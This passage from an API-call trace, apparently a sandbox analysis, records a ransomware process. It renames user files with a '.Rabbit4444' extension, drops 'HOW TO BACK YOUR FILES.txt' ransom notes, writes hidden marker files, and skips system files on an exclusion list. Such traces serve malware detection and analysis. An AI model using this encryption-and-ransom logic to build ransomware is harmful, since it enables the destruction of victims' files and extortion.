lpMem=0x11e2f0 | out: hHeap=0xe0000) returned 1 [0068.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.654] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15996471542) returned 1 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0068.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0068.654] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.654] CloseHandle (hObject=0x29c) returned 1 [0068.654] CloseHandle (hObject=0x280) returned 1 [0068.654] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\www.bing[1].xml.Rabbit4444") returned 154 [0068.654] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\www.bing[1].xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\91pwxike\\www.bing[1].xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\www.bing[1].xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\91pwxike\\www.bing[1].xml.rabbit4444"), dwFlags=0x1) returned 1 [0068.655] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x68c64a0c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.bing[1].xml", cAlternateFileName="WWWBIN~1.XML")) returned 0 [0068.655] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0068.655] lstrcpyW (in: lpString1=0x130ec38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\91PWXIKE\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\91pwxike\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.657] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.657] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.658] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.658] CloseHandle (hObject=0x280) returned 1 [0068.658] CloseHandle (hObject=0x228) returned 1 [0068.658] GetCurrentThreadId () returned 0xd98 [0068.658] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0068.658] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H" [0068.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0068.658] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H" [0068.658] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\" [0068.658] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\.BFC0E91B00AE8A0620D3" [0068.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\6xk9396h\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.659] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.662] FlushFileBuffers (hFile=0x228) returned 1 [0068.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.663] CloseHandle (hObject=0x228) returned 1 [0068.664] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H") returned 127 [0068.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.664] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf23f2961, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0068.664] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.664] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.664] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.664] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.664] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf23f2961, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.664] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.664] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.664] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.664] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.664] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.664] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf23f2961, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf23f2961, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23f2961, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.664] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.664] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.665] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf23f2961, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf23f2961, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf23f2961, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0068.665] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0068.665] lstrcpyW (in: lpString1=0x130ec38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.665] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\6XK9396H\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\6xk9396h\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.666] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.666] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.666] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.666] CloseHandle (hObject=0x280) returned 1 [0068.667] CloseHandle (hObject=0x228) returned 1 [0068.667] GetCurrentThreadId () returned 0xd98 [0068.667] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0068.667] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache" [0068.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126308 | out: hHeap=0xe0000) returned 1 [0068.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0068.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache" [0068.667] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\" [0068.667] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" [0068.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.668] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.670] FlushFileBuffers (hFile=0x228) returned 1 [0068.671] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.671] CloseHandle (hObject=0x228) returned 1 [0068.672] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache") returned 108 [0068.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.672] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc4855d2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc487bf98, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2418ea0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0068.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.672] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.672] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.672] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.672] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc4855d2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc487bf98, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2418ea0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.672] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.672] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.672] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.672] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.672] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2418ea0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2418ea0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf2418ea0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.672] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0068.672] lstrcmpiW (lpString1="Content", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.672] lstrcmpiW (lpString1="Content", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.672] lstrcmpiW (lpString1="Content", lpString2="Rabbit4444.exe") returned -1 [0068.672] lstrcmpiW (lpString1="Content", lpString2=".") returned 1 [0068.672] lstrcmpiW (lpString1="Content", lpString2="..") returned 1 [0068.672] lstrcmpiW (lpString1="Content", lpString2="windows") returned -1 [0068.673] lstrcmpiW (lpString1="Content", lpString2="bootmgr") returned 1 [0068.673] lstrcmpiW (lpString1="Content", lpString2="pagefile.sys") returned -1 [0068.673] lstrcmpiW (lpString1="Content", lpString2="boot") returned 1 [0068.673] lstrcmpiW (lpString1="Content", lpString2="ids.txt") returned -1 [0068.673] lstrcmpiW (lpString1="Content", lpString2="NTUSER.DAT") returned -1 [0068.673] lstrcpyW (in: lpString1=0x130ec12, lpString2="Content" | out: lpString1="Content") returned="Content" [0068.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content", dwFileAttributes=0x2010) returned 1 [0068.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0068.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xea) returned 0x11fc40 [0068.673] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122368 [0068.673] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="Rabbit4444.exe") returned -1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2=".") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="..") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="windows") returned -1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="bootmgr") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="pagefile.sys") returned -1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="boot") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="ids.txt") returned 1 [0068.674] lstrcmpiW (lpString1="MetaData", lpString2="NTUSER.DAT") returned -1 [0068.674] lstrcpyW (in: lpString1=0x130ec12, lpString2="MetaData" | out: lpString1="MetaData") returned="MetaData" [0068.674] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", dwFileAttributes=0x2010) returned 1 [0068.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0068.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xec) returned 0x11f670 [0068.674] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x121fe8 [0068.674] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0068.674] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0068.674] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.676] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.676] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.677] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.677] CloseHandle (hObject=0x280) returned 1 [0068.677] CloseHandle (hObject=0x228) returned 1 [0068.677] GetCurrentThreadId () returned 0xd98 [0068.677] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0068.677] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" [0068.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11f670 | out: hHeap=0xe0000) returned 1 [0068.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 